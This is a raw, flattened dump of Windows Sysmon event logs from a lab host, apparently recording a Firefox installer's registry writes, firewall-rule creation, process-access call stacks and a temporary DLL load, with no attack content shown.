13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005df) 13241300x800000000000000016634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{5BE8FC8E-BDDE-4FFE-A3FD-32223BC634E2}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\Program Files\Mozilla Firefox\firefox.exe|Name=Firefox (C:\Program Files\Mozilla Firefox)| 10341000x800000000000000016633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:54.364{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\liteFirewallW.dll2021-01-18 13:59:54.364 12241200x800000000000000016630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteKey2021-01-18 13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500_Classes\*\shell\Firefox-308046B0AF4A39CB 10341000x800000000000000016629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 